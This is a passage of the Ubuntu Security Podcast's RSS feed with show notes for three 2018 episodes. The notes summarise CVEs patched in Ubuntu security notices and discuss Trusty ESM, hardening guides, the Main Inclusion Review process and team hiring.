          This week we look at some details of the 43 unique CVEs addressed across the
  supported Ubuntu releases and talk about the recently announced Extended
  Security Maintenance support for Ubuntu 14.04 Trusty Tahr.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  This week we look at some details of the 43 unique CVEs addressed across the
  supported Ubuntu releases and talk about the recently announced Extended
  Security Maintenance support for Ubuntu 14.04 Trusty Tahr.
  </itunes:summary>
        <description>  This week we look at some details of the 43 unique CVEs addressed across the
  supported Ubuntu releases and talk about the recently announced Extended
  Security Maintenance support for Ubuntu 14.04 Trusty Tahr.
  </description>
        <googleplay:description>  This week we look at some details of the 43 unique CVEs addressed across the
  supported Ubuntu releases and talk about the recently announced Extended
  Security Maintenance support for Ubuntu 14.04 Trusty Tahr.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at some details of the 43 unique CVEs addressed across the
supported Ubuntu releases and talk about the recently announced Extended
Security Maintenance support for Ubuntu 14.04 Trusty Tahr.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>43 unique CVEs addressed across the various supported releases of Ubuntu
(Bionic, Xenial, Trusty and Precise ESM)</p>
<h3 id="usn-3762-1-usn-3762-2-linux-kernel-vulnerabilities">[<a href="https://usn.ubuntu.com/3762-1/">USN-3762-1</a>, USN-3762-2] Linux kernel vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Bionic and corresponding HWE kernel for Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-13695">CVE-2017-13695</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1118">CVE-2018-1118</a></li>
</ul>
</li>
<li>Both information disclosure vulnerabilities which could allow exposure of kernel addresses
<ul>
<li>Not directly an issue but could be used to defeat ASLR when combined with another vulnerability</li>
</ul>
</li>
</ul>
<h3 id="usn-3763-1-linux-kernel-vulnerability">[<a href="https://usn.ubuntu.com/3763-1/">USN-3763-1</a>] Linux kernel vulnerability</h3>
<ul>
<li>1 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5390">CVE-2018-5390</a></li>
</ul>
</li>
<li>SegmentSmack (see episode 0)</li>
</ul>
<h3 id="lsn-0043-1-linux-kernel-vulnerability">[LSN-0043-1] Linux kernel vulnerability</h3>
<ul>
<li>Livepatch to fix multiple vulnerabilities fixed in previous kernel package updates</li>
</ul>
<h3 id="usn-3764-1-zsh-vulnerabilities">[<a href="https://usn.ubuntu.com/3764-1/">USN-3764-1</a>] Zsh vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1100">CVE-2018-1100</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13259">CVE-2018-13259</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0502">CVE-2018-0502</a></li>
</ul>
</li>
<li>2 issues in shebang / hashbang handling
<ul>
<li>shebang lines longer than 64 bytes truncated - could execute wrong interpreter</li>
<li>mishandling of some particular formatted shebang lines which could execute
interpreter from second line of file</li>
</ul>
</li>
<li>Stack based buffer-overflow allowing code execution in the context of a different user</li>
</ul>
<h3 id="usn-3747-2-openjdk-10-regression">[<a href="https://usn.ubuntu.com/3747-2/">USN-3747-2</a>] OpenJDK 10 regression</h3>
<ul>
<li>4 CVEs addressed in Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-2972">CVE-2018-2972</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-2952">CVE-2018-2952</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-2826">CVE-2018-2826</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-2825">CVE-2018-2825</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3761-2-usn-3761-3-firefox-regressions">[<a href="https://usn.ubuntu.com/3761-2/">USN-3761-2</a>, USN-3761-3] Firefox regressions</h3>
<ul>
<li>5 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12383">CVE-2018-12383</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12378">CVE-2018-12378</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12377">CVE-2018-12377</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12376">CVE-2018-12376</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12375">CVE-2018-12375</a></li>
</ul>
</li>
<li>Previous update to latest firefox resulted in issues due to language packs
missing (and hence missing spellcheck dictionaries) and use of wrong search
provider</li>
</ul>
<h3 id="usn-3765-1-usn-3765-2-curl-vulnerability">[<a href="https://usn.ubuntu.com/3765-1/">USN-3765-1</a>, <a href="https://usn.ubuntu.com/3765-2/">USN-3765-2</a>] curl vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic and Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14618">CVE-2018-14618</a></li>
</ul>
</li>
<li>Similar to previous CVE-2017-8816 - integer overflow in calculations during
NTLM authentication could allow heap buffer overflow and hence RCE</li>
<li>Uses the password length in this calculation (which is supplied by the attacker) so relatively easy to trigger</li>
</ul>
<h3 id="usn-3722-5-clamav-regression">[<a href="https://usn.ubuntu.com/3722-5/">USN-3722-5</a>] ClamAV regression</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-0361">CVE-2018-0361</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0360">CVE-2018-0360</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3766-1-usn-3766-2-php-vulnerabilities">[<a href="https://usn.ubuntu.com/3766-1/">USN-3766-1</a>, USN-3766-2] PHP vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic and Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14883">CVE-2018-14883</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14851">CVE-2018-14851</a></li>
<li><a href="https://ubuntu.com/security/CVE-2015-9253">CVE-2015-9253</a></li>
</ul>
</li>
<li>Integer overflows in JPEG and EXIF handlers leading to out-of-bounds reads and hence crash - DoS</li>
<li>php-fpm (FastCGI process manager) - alternative FastCGI implementation for
PHP - could cause DoS since didn&rsquo;t restart child processes correctly - then
consume CPU and disk space (via logging) - only fixed in Bionic for now</li>
</ul>
<h3 id="usn-3722-6-clamav-vulnerabilities">[<a href="https://usn.ubuntu.com/3722-6/">USN-3722-6</a>] ClamAV vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-0361">CVE-2018-0361</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-0360">CVE-2018-0360</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3767-1-usn-3767-2-glib-vulnerabilities">[<a href="https://usn.ubuntu.com/3767-1/">USN-3767-1</a>, <a href="https://usn.ubuntu.com/3767-2/">USN-3767-2</a>] GLib vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic and Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16429">CVE-2018-16429</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16428">CVE-2018-16428</a></li>
</ul>
</li>
<li>Issues with markup parsing</li>
</ul>
<h3 id="usn-3768-1-ghostscript-vulnerabilities">[<a href="https://usn.ubuntu.com/3768-1/">USN-3768-1</a>] Ghostscript vulnerabilities</h3>
<ul>
<li>16 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16802">CVE-2018-16802</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16585">CVE-2018-16585</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16543">CVE-2018-16543</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16542">CVE-2018-16542</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16541">CVE-2018-16541</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16540">CVE-2018-16540</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16539">CVE-2018-16539</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16513">CVE-2018-16513</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16511">CVE-2018-16511</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16510">CVE-2018-16510</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-16509">CVE-2018-16509</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15911">CVE-2018-15911</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15910">CVE-2018-15910</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15909">CVE-2018-15909</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-15908">CVE-2018-15908</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11645">CVE-2018-11645</a></li>
</ul>
</li>
<li>Ghostscript is used to process Postscript (and other formats) - PS is Turing
Complete so in general is unsafe</li>
<li>Hence Ghostscript includes a sandbox (-dSAFER) to try and prevent issues with
handling of untrusted files</li>
<li>Tavis Ormandy previously found a number of issues in the SAFER sandbox which
allowed escape from it and execution of commands (ie. CVE-2016-7977 etc.)</li>
<li>Recently discovered more - including ability to execute arbitrary code.</li>
</ul>
<h3 id="usn-3769-1-bind-vulnerability">[<a href="https://usn.ubuntu.com/3769-1/">USN-3769-1</a>] Bind vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5740">CVE-2018-5740</a></li>
</ul>
</li>
<li>Trigger assertion failure from specific input from remote server to cause crash and hence DoS
<ul>
<li>In deny-answer-aliases feature which is not enabled by default so not so high impact</li>
</ul>
</li>
</ul>
<h3 id="usn-3770-1-usn-3770-2-little-cms-vulnerabilities">[<a href="https://usn.ubuntu.com/3770-1/">USN-3770-1</a>, USN-3770-2] Little CMS vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic and Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16435">CVE-2018-16435</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-10165">CVE-2016-10165</a></li>
</ul>
</li>
<li>1 CVEs addressed in Precise ESM only
<ul>
<li><a href="https://ubuntu.com/security/CVE-2013-4276">CVE-2013-4276</a></li>
</ul>
</li>
<li>Multiple issues in handling of ICC colour profiles (integer overflow leading
to stack and heap buffer overflows on reads an writes)</li>
<li>Little CMS often used in webapps which do image processing - in this case
allows remote DoS or possibly remote code execution</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="ubuntu-14-dot-04-esm-announced">Ubuntu 14.04 ESM Announced</h3>
<ul>
<li>Extended Security Maintenance for Trusty 14.04 past the official EOL</li>
<li>Security updates for the kernel and the most widely used packages in main</li>
<li><a href="https://blog.ubuntu.com/2018/09/19/extended-security-maintenance-ubuntu-14-04-trusty-tahr">https://blog.ubuntu.com/2018/09/19/extended-security-maintenance-ubuntu-14-04-trusty-tahr</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-manager">Ubuntu Security Manager</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1278287">https://boards.greenhouse.io/canonical/jobs/1278287</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E005.mp3" length="15121056" type="audio/mpeg" /><itunes:duration>15:45</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 4
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-4/</link>
          <pubDate>Mon, 10 Sep 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E004.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 4</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
          A quieter week in package updates - this week we look at some details of the 9
  unique CVEs addressed across the supported Ubuntu releases and talk about
  various hardening guides for Ubuntu.
  
        
        ]]></itunes:subtitle>
        <itunes:summary>  A quieter week in package updates - this week we look at some details of the 9
  unique CVEs addressed across the supported Ubuntu releases and talk about
  various hardening guides for Ubuntu.
  </itunes:summary>
        <description>  A quieter week in package updates - this week we look at some details of the 9
  unique CVEs addressed across the supported Ubuntu releases and talk about
  various hardening guides for Ubuntu.
  </description>
        <googleplay:description>  A quieter week in package updates - this week we look at some details of the 9
  unique CVEs addressed across the supported Ubuntu releases and talk about
  various hardening guides for Ubuntu.
  </googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>A quieter week in package updates - this week we look at some details of the 9
unique CVEs addressed across the supported Ubuntu releases and talk about
various hardening guides for Ubuntu.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>9 unique CVEs addressed</p>
<h3 id="usn-3759-1-libtirpc-vulnerabilities">[<a href="https://usn.ubuntu.com/3759-1/">USN-3759-1</a>] libtirpc vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-8779">CVE-2017-8779</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14622">CVE-2018-14622</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4429">CVE-2016-4429</a></li>
</ul>
</li>
<li>Transport Independent RPC Library, used by NFS</li>
<li>1 medium priority issue:
<ul>
<li>Crash from NULL pointer dereference when run out of file descriptions (failure to check return value) - a remote attacker could cause crash by flooding with new connections</li>
</ul>
</li>
<li>2 low priority issues:
<ul>
<li>&ldquo;rpcbomb&rdquo; - allows an unauthenticated attacker to DoS via memory exhaustion</li>
<li>Stack based buffer overflow could cause a crash when flooded by ICMP and UDP packets in the sunrpc implementation - fixed by replacing stack based memory allocation with heap-based allocation instead</li>
<li>Common pattern to fix this type of issue - similar work in Linux kernel recently by KSPP to replace VLAs</li>
</ul>
</li>
</ul>
<h3 id="usn-3759-2-libtirpc-vulnerabilities">[<a href="https://usn.ubuntu.com/3759-2/">USN-3759-2</a>] libtirpc vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2017-8779">CVE-2017-8779</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14622">CVE-2018-14622</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-4429">CVE-2016-4429</a></li>
</ul>
</li>
<li>Same as above for the Precise Extended Security Maintenence release</li>
</ul>
<h3 id="usn-3760-1-transfig-vulnerability">[<a href="https://usn.ubuntu.com/3760-1/">USN-3760-1</a>] transfig vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-16140">CVE-2018-16140</a></li>
</ul>
</li>
<li>transfig / fig2dev - utilities for converting XFig files</li>
<li>Fixes an error which allows memory corruption when handling specially crafted files</li>
</ul>
<h3 id="usn-3761-1-firefox-vulnerabilities">[<a href="https://usn.ubuntu.com/3761-1/">USN-3761-1</a>] Firefox vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-12383">CVE-2018-12383</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12378">CVE-2018-12378</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12377">CVE-2018-12377</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12376">CVE-2018-12376</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12375">CVE-2018-12375</a></li>
</ul>
</li>
<li>Latest firefox release (62) fixing a number of issues including DoS and RCE</li>
<li>One interesting one is CVE-2018-12383 - in Firefox 58 the password storage
format was changed (was sqlite, then was changed to json). When user sets a
master password, this is used to encrypt all stored passwords. However, this
was only done for the copy stored with the new format - the old copy would
still be stored unencrypted since it never had a master password set on
it. This is now fixed to simply delete the old copy of the password DB.</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="discussions-around-hardening-guides-for-ubuntu">Discussions around hardening guides for Ubuntu</h3>
<ul>
<li>A number of &lsquo;best practices&rsquo; guides exist for hardening Ubuntu installations from reputable organisations
<ul>
<li><a href="https://www.ncsc.gov.uk/guidance/eud-security-guidance-ubuntu-1804-lts">NCSC</a></li>
<li><a href="https://www.cisecurity.org/benchmark/ubuntu_linux/">CIS Benchmarks</a></li>
<li>many others</li>
</ul>
</li>
<li>In general these have similar recommendations:
<ul>
<li>Use UEFI Secure Boot</li>
<li>Disable unnecesary services</li>
<li>Use a known and fixed networking configuration (disable DHCP / use VPN etc)</li>
<li>Enable Mandatory Access Control frameworks (ie. AppArmor)</li>
<li>Use a specific password policy</li>
<li>Enable auditing</li>
</ul>
</li>
<li>Differ in level of detail and technical knowledge needed to deploy</li>
<li>Typically aimed at computer and network administrators (not end-users)</li>
<li>Ubuntu already includes a number of these recommendations out of the box:
<ul>
<li><a href="https://wiki.ubuntu.com/Security/Features">https://wiki.ubuntu.com/Security/Features</a></li>
</ul>
</li>
<li>Ubuntu strives to strike a balance between security and usability out-of-the-box</li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-manager">Ubuntu Security Manager</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1278287">https://boards.greenhouse.io/canonical/jobs/1278287</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E004.mp3" length="10189138" type="audio/mpeg" /><itunes:duration>10:36</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 3
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-3/</link>
          <pubDate>Mon, 03 Sep 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
          <guid>https://people.canonical.com/~amurray/USP/USP_E003.mp3</guid>
          <itunes:author>Ubuntu Security Team</itunes:author>
          
        
          <itunes:title>Episode 3</itunes:title>
        
        <itunes:subtitle><![CDATA[
        
        This week we look at 29 unique CVEs addressed across the supported Ubuntu releases, a discussion of the Main Inclusion Review process and recent news around the bubblewrap package, and open positions within the team.
        
        ]]></itunes:subtitle>
        <itunes:summary>This week we look at 29 unique CVEs addressed across the supported Ubuntu releases, a discussion of the Main Inclusion Review process and recent news around the bubblewrap package, and open positions within the team.</itunes:summary>
        <description>This week we look at 29 unique CVEs addressed across the supported Ubuntu releases, a discussion of the Main Inclusion Review process and recent news around the bubblewrap package, and open positions within the team.</description>
        <googleplay:description>This week we look at 29 unique CVEs addressed across the supported Ubuntu releases, a discussion of the Main Inclusion Review process and recent news around the bubblewrap package, and open positions within the team.</googleplay:description>
        <content:encoded><![CDATA[<h2 id="overview">Overview</h2>
<p>This week we look at 29 unique CVEs addressed across the supported Ubuntu releases, a discussion of the Main Inclusion Review process and recent news around the bubblewrap package, and open positions within the team.</p>
<h2 id="this-week-in-ubuntu-security-updates">This week in Ubuntu Security Updates</h2>
<p>29 unique CVEs addressed</p>
<h3 id="usn-3756-1-intel-microcode-vulnerabilities">[<a href="https://usn.ubuntu.com/3756-1/">USN-3756-1</a>] Intel Microcode vulnerabilities</h3>
<ul>
<li>3 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-3640">CVE-2018-3640</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3639">CVE-2018-3639</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-3646">CVE-2018-3646</a></li>
</ul>
</li>
<li>Intel microcode updates to address L1TF, Spectre Variant 4 and Rogue System Register Read (RSRE)</li>
<li>Intel initially released this with a brand new license which included terms around disallowing benchmarking and possibly preventing redistribution via the Ubuntu mirrors
<ul>
<li>As a result, we couldn&rsquo;t provide updated microcode packages to full address L1TF etc</li>
<li>Intel have now reverted back to the license used on previous microcode packages and so this can now finally be released</li>
</ul>
</li>
<li><a href="https://perens.com/2018/08/22/new-intel-microcode-license-restriction-is-not-acceptable/">https://perens.com/2018/08/22/new-intel-microcode-license-restriction-is-not-acceptable/</a></li>
</ul>
<h3 id="usn-3755-1-gd-vulnerabilities">[<a href="https://usn.ubuntu.com/3755-1/">USN-3755-1</a>] GD vulnerabilities</h3>
<ul>
<li>2 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-5711">CVE-2018-5711</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000222">CVE-2018-1000222</a></li>
</ul>
</li>
<li>Popular image manipulation and creating library used by PHP and therefore in many PHP web applications</li>
<li>Issue in handling of signed integers in GIF decoder allows an attacker to enter an infinite loop and cause DoS via a specially crafted GIF file</li>
<li>Double free in JPEG decoder could allow a user to possibly execute arbitrary code via specially crafted JPEG file</li>
</ul>
<h3 id="usn-3757-1-poppler-vulnerability">[<a href="https://usn.ubuntu.com/3757-1/">USN-3757-1</a>] poppler vulnerability</h3>
<ul>
<li>1 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-13988">CVE-2018-13988</a></li>
</ul>
</li>
<li>Fixed a crash (hence DoS) due to out-of-bounds read in PDF decoding</li>
</ul>
<h3 id="usn-3758-1-libx11-vulnerabilities">[<a href="https://usn.ubuntu.com/3758-1/">USN-3758-1</a>] libx11 vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Trusty, Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14600">CVE-2018-14600</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14599">CVE-2018-14599</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14598">CVE-2018-14598</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7943">CVE-2016-7943</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7942">CVE-2016-7942</a></li>
</ul>
</li>
<li>Bundles some fixes for some low priority old CVEs with some new medium priority CVE fixes</li>
<li>Updates are usually done in this manner, where low priority fixes wait to get fixed along with higher priority fixes for a package</li>
<li>Fixes issues around handling of data from untrusted servers and image decoding
<ul>
<li>Usual failure to validate inputs, off-by-one, integer signedness confusion and incorrect freeing of dynamically allocated memory style issues</li>
</ul>
</li>
</ul>
<h3 id="usn-3758-2-libx11-vulnerabilities">[<a href="https://usn.ubuntu.com/3758-2/">USN-3758-2</a>] libx11 vulnerabilities</h3>
<ul>
<li>5 CVEs addressed in Precise ESM
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-14600">CVE-2018-14600</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14599">CVE-2018-14599</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-14598">CVE-2018-14598</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7943">CVE-2016-7943</a></li>
<li><a href="https://ubuntu.com/security/CVE-2016-7942">CVE-2016-7942</a></li>
</ul>
</li>
</ul>
<h3 id="usn-3752-3-linux-kernel--azure-gcp-oem--vulnerabilities">[<a href="https://usn.ubuntu.com/3752-3/">USN-3752-3</a>] Linux kernel (Azure, GCP, OEM) vulnerabilities</h3>
<ul>
<li>18 CVEs addressed in Xenial, Bionic
<ul>
<li><a href="https://ubuntu.com/security/CVE-2018-1000204">CVE-2018-1000204</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-9415">CVE-2018-9415</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-5814">CVE-2018-5814</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13406">CVE-2018-13406</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13405">CVE-2018-13405</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-13094">CVE-2018-13094</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12904">CVE-2018-12904</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12233">CVE-2018-12233</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-12232">CVE-2018-12232</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11506">CVE-2018-11506</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-11412">CVE-2018-11412</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1120">CVE-2018-1120</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1108">CVE-2018-1108</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1093">CVE-2018-1093</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10881">CVE-2018-10881</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10840">CVE-2018-10840</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-10323">CVE-2018-10323</a></li>
<li><a href="https://ubuntu.com/security/CVE-2018-1000200">CVE-2018-1000200</a></li>
</ul>
</li>
<li>Kernel updates for various hardware platforms etc corresponding to the same updates from last week</li>
</ul>
<h2 id="goings-on-in-ubuntu-security-community">Goings on in Ubuntu Security Community</h2>
<h3 id="mir-process-and-bubblewrap">MIR Process and bubblewrap</h3>
<ul>
<li>Security team is responsible for doing security audits of packages which are proposed to be included in the main section of the Ubuntu package repository
<ul>
<li>Packages in main are officially maintained, supported and recommended so deserve a high level of scrutiny before promotion into main</li>
<li>Security team historically only provides security updates to packages in main as well</li>
<li>So we have to be confident we can maintain and support a given package</li>
</ul>
</li>
<li>To perform the security review we look at a number of things:
<ul>
<li>The code is evaluated to determine how easy or not it would be to maintain</li>
<li>The package itself is evaluated to look for potential issues</li>
<li>Code is then evaluated to look for potential existing security vulnerabilities</li>
</ul>
</li>
<li>This can be a time consuming process, especially to do well</li>
<li>Recently this was in the news, when Hanno Böck (infosec journalist and
researcher) and Tavis Ormandy (GPZ) raised the issue of lack of bubblewrap
support for gnome desktop thumbnailers
<ul>
<li>bubblewrap provides support for sandboxing processes via namespaces and the
use of it to sandbox desktop thumbnailers was introduced in the GNOME 3.26
release</li>
<li>It was planned to be supported for Ubuntu 18.04, but to do this the package
had to be moved from universe into main, hence a MIR</li>
<li>Due to shifting priorities, the security team was not able to get this done
in time and hence the feature had to be disabled</li>
<li>This MIR is being proritised now so this security hardening feature should be available in an upcoming release</li>
<li>Security team is also looking at how to strengthen the hardening via AppArmor MAC profiles in addition</li>
<li>Thanks to Hanno and Tavis for giving this greater visibility</li>
</ul>
</li>
<li><a href="https://wiki.ubuntu.com/MainInclusionProcess">https://wiki.ubuntu.com/MainInclusionProcess</a></li>
<li><a href="https://www.bleepingcomputer.com/news/security/ubuntu-is-undoing-a-gnome-security-feature/">https://www.bleepingcomputer.com/news/security/ubuntu-is-undoing-a-gnome-security-feature/</a></li>
</ul>
<h3 id="hiring">Hiring</h3>
<h4 id="ubuntu-security-manager">Ubuntu Security Manager</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1278287">https://boards.greenhouse.io/canonical/jobs/1278287</a></li>
</ul>
<h4 id="ubuntu-security-engineer">Ubuntu Security Engineer</h4>
<ul>
<li><a href="https://boards.greenhouse.io/canonical/jobs/1158266">https://boards.greenhouse.io/canonical/jobs/1158266</a></li>
</ul>
<h2 id="get-in-contact">Get in contact</h2>
<ul>
<li><a href="mailto:security@ubuntu.com">security@ubuntu.com</a></li>
<li><a href="https://libera.chat">#ubuntu-security on the Libera.Chat IRC network</a></li>
<li><a href="https://twitter.com/ubuntu_sec">@ubuntu_sec on twitter</a></li>
</ul>
]]></content:encoded><itunes:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></itunes:image>
          <googleplay:image href="https://ubuntusecuritypodcast.org/img/usp_logo_500.png"></googleplay:image><enclosure url="https://people.canonical.com/~amurray/USP/USP_E003.mp3" length="9633252" type="audio/mpeg" /><itunes:duration>10:02</itunes:duration><itunes:explicit>false</itunes:explicit>
          <googleplay:explicit>no</googleplay:explicit></item>
        <item>
          
            <title>Episode 2
          
          
          </title>
          <link>https://ubuntusecuritypodcast.org/episode-2/</link>
          <pubDate>Tue, 28 Aug 2018 00:00:00 +0000 </pubDate>
          <dc:creator></dc:creator>
